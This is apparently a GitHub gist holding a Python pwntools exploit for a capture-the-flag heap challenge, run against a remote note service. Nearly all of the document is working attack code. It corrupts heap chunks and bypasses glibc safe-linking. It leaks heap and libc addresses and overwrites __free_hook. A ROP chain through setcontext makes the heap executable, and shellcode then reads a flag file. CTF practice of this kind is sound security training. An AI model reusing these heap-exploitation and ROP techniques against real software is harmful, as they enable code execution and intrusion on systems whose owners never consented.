@hkraw
Created December 14, 2020 05:59
#!/usr/bin/python3
from pwn import *
from time import sleep
from past.builtins import xrange
import subprocess
# Util
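def add(_id,size,data=None,lable=None,leaks=False):
    """Send one "add note" transaction (menu option 1) over the module-global tube `io`.

    Args:
        _id: note slot number, sent as text after the 'Id: ' prompt.
        size: allocation size, sent as text after the 'Size: ' prompt.
        data: bytes/str written after 'Data: '; defaults to the filler 'HK'.
        lable: bytes/str written after 'Label: '; defaults to the filler 'HK'.
            (Parameter name kept as-is: callers pass it by keyword.)
        leaks: when true, return right after the data is sent so the caller
            can read the service's reply itself instead of answering 'Label: '.
    """
    io.sendlineafter('> ','1')
    io.sendlineafter('Id: ',f'{_id}')
    io.sendlineafter('Size: ',f'{size}')
    # Two-byte filler when no payload is supplied.
    io.sendafter('Data: ', 'HK' if data is None else data)
    # PEP 8: test truthiness rather than comparing to the literal True.
    if leaks:
        # Caller reads the response itself (see the leaks=True call in Hack()).
        return
    io.sendafter('Label: ', 'HK' if lable is None else lable)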
def view(_id):
    """Request note `_id` (menu option 2) on `io` and return [rest, leak_line].

    Reads up to the literal 'leak: ', takes the remainder of that line
    (stripped) as the leak value, then reads up to 'Label:'. The result is a
    two-element list: [bytes received up to and including 'Label:', the
    stripped leak line].
    """
    io.sendlineafter('> ','2')
    io.sendlineafter('Id: ',f'{_id}')
    io.recvuntil('leak: ')
    leak_line = io.recvline().strip()
    # Must be read after the leak line: the tube is consumed in order.
    rest = io.recvuntil('Label:')
    return [rest, leak_line]
def delete(_id):
    """Free note `_id` via menu option 3 on the module-global tube `io`."""
    for prompt, answer in (('> ', '3'), ('Id: ', f'{_id}')):
        io.sendlineafter(prompt, answer)
def edit(_id,data):
    """Overwrite note `_id`'s data via menu option 4 on `io`.

    Only the 'Data: ' prompt is answered; no size or label is sent.
    """
    for prompt, answer in (('> ', '4'), ('Id: ', f'{_id}')):
        io.sendlineafter(prompt, answer)
    io.sendafter('Data: ', data)
def mask(heap_base,target):
    """Return `target` XOR-ed with `heap_base` shifted right by 12 bits.

    This is the (addr >> 12) ^ ptr transformation glibc's safe-linking applies
    to free-list pointers; the caller passes the heap base as the address.
    """
    shifted = heap_base >> 12
    return target ^ shifted
# Struct
'''
typedef struct notes {
int64 size;
char* datapointer;
char[0x10] lable;
}
'''
# Addr
# Offsets that Hack() adds to / subtracts from libc_base. They belong to the
# one libc build this script was written against (not identified on the page)
# and are meaningless for any other build.
stdout_leak_offset = 0x1e4744  # subtracted from the leaked stdout value to derive libc_base
__free_hook = 0x1e6e40  # added to libc_base in Hack()
setcontext = 0x53030  # Hack() uses libc_base+setcontext+61
# Gadgets
# Same caveat: libc-build-specific offsets, each added to libc_base in Hack().
L_POP_RDI = 0x00157659
L_POP_RSI = 0x00150692
L_POP_RDX = 0x0012f699 # rdx ; rxxx ; ret
L_POP_RAX = 0x0010e535
L_SYSCALL = 0x000dfb19
# Hack
def Hack():
    """Drive the note service through add/view/delete/edit on the module-global `io`.

    The call sequence is strictly order-dependent and every numeric constant
    (chunk sizes, heap offsets, the libc offsets at file top) is tied to the
    one binary/libc build the script was written against; nothing here is
    generic. Prints the recovered heap and libc base addresses as it goes.
    """
    global io
    add(0,0x18) #0
    add(1,0x18) #1
    add(2,0x18) #2
    add(3,0x18) #3
    add(4,0x88) #4
    delete(3)
    delete(0)
    add(0,0x18,lable='A'*0x10+'\x88') #0
    edit(1,b'A'*0x18+p64(0x91)[0:7])
    edit(4,p64(0x21)*(0x88//8))
    delete(0)
    add(0,0x18,lable='A'*0x10+'\x18') #0
    delete(1)
    add(1,0x18,lable='A'*0x10+'\x88') #1
    # view() returns [bytes up to 'Label:', stripped leak line]; the heap base
    # is taken from 8 bytes at offset 0x2e of the first element, minus 0x10.
    some_leak,a = view(2)
    heap_base = u64(some_leak[0x2e:0x2e+8])-0x10
    print(hex(heap_base))
    add(3,0x88) #3
    delete(3)
    delete(4)
    delete(0)
    add(0,0x18,lable='a'*0x10+'\xff')
    edit(1,b'A'*0x18+p64(0x21)+p64(0)*3+p64(0x21)+p64(0)*3+p64(0x91)+p64(mask(heap_base,heap_base+0x2a0)))
    delete(0)
    add(4,0x88) #2
    add(3,0x88,p64(0x288)+p64(heap_base+0x10) + p64(0)*2 +p64(0x421)+p64(heap_base+0x4d0)+p64(0)*2+p64(0)*4 + p64(0x208))
    # Assembled at runtime; the two heap_base-relative immediates are filled
    # in through the f-string. The literal must stay at column 0 (its body is
    # part of the string).
    shellcode = asm(f'''
mov rax, 2
mov rdi, {heap_base+0x28}
mov rsi, 0
syscall
mov rdi, rax
mov rax, 0x0
mov rdx, 0x100
mov rsi, {heap_base+0x10}
syscall
mov rax, 1
mov rdi, 1
mov rdx, 0x100
syscall
''',arch='amd64')
    edit(0,p64(0x707070707070707)*3+b'/home/ctf/flag.txt\0'.ljust(0x68,b'\0')+p64(0)+p64(0xa1)+b'\0'*0x98+p64(0x161) + p64(heap_base+0xc0)*6+shellcode)
    edit(3,p64(0x98)+p64(heap_base+0xa0))
    delete(0)
    edit(3,p64(0x98)+p64(heap_base+0xa0))
    # `a` is the stripped leak line from view(); int(a,0) parses it as a
    # numeric literal with auto-detected base.
    edit(0,p16(( (int(a,0)&0xf) << 12) + 0x6c0))
    # leaks=True makes add() return before the label prompt so the 0x10 bytes
    # echoed back can be read here; libc_base follows from the stdout offset.
    add(2,0x38,p64(0xfbad1800)+p64(0)*3+p8(0),leaks=True)
    libc_leak = u64(io.recvn(0x10)[0:0x8])
    libc_base = libc_leak - stdout_leak_offset
    print(hex(libc_base))
    print(hex(libc_leak))
    # 0x0014b760 mov rdx, qword [rdi+0x08] ; mov qword [rsp], rax ; call qword [rdx+0x20]
    # NOTE(review): the purpose of this line is not evident from the page;
    # presumably it answers the label prompt that the leaks=True add() skipped.
    io.sendline('aaa')
    edit(0,p64(libc_base+__free_hook))
    delete(4)
    add(4,0x38,p64(libc_base+0x14b760)) #4
    edit(3,p64(0x100)+p64(heap_base+0x90))
    edit(0,p64(0)*3+p64(0x101))
    edit(3,p64(0xf8)+p64(heap_base+0xb0))
    edit(0,p64(0)+p64(heap_base+0xb8)+p64(libc_base+L_POP_RDI)*2 + p64(0)+p64(libc_base+setcontext+61) +\
        p64(libc_base+L_POP_RDI)*2+p64(libc_base+L_POP_RDI)+\
        p64(heap_base)+p64(libc_base+L_POP_RSI)+p64(0x1000)+\
        p64(libc_base+L_POP_RDX)+p64(0x7)+p64(0)+\
        p64(libc_base+L_POP_RAX)+p64(0xa)+\
        p64(libc_base+L_SYSCALL)+p64(heap_base+0x170)+\
        p64(heap_base+0xe8)*3 + p64(libc_base+L_POP_RDI)*1+p64(libc_base+L_POP_RDI)
    )
    # pwntools pause(): blocks for operator input before the final delete.
    pause()
    delete(0)
# Pwn
if __name__=='__main__':
    # `io` is bound here at module level and read as a global by the helper
    # functions above (add/view/delete/edit) and by Hack(). The commented-out
    # line is the local alternative that runs the binary under a pinned libc.
    # io = process('./chall',env={'LD_PRELOAD':'./libc.so.6'})
    io = remote('challs.xmas.htsp.ro',2005)
    Hack()
    io.interactive()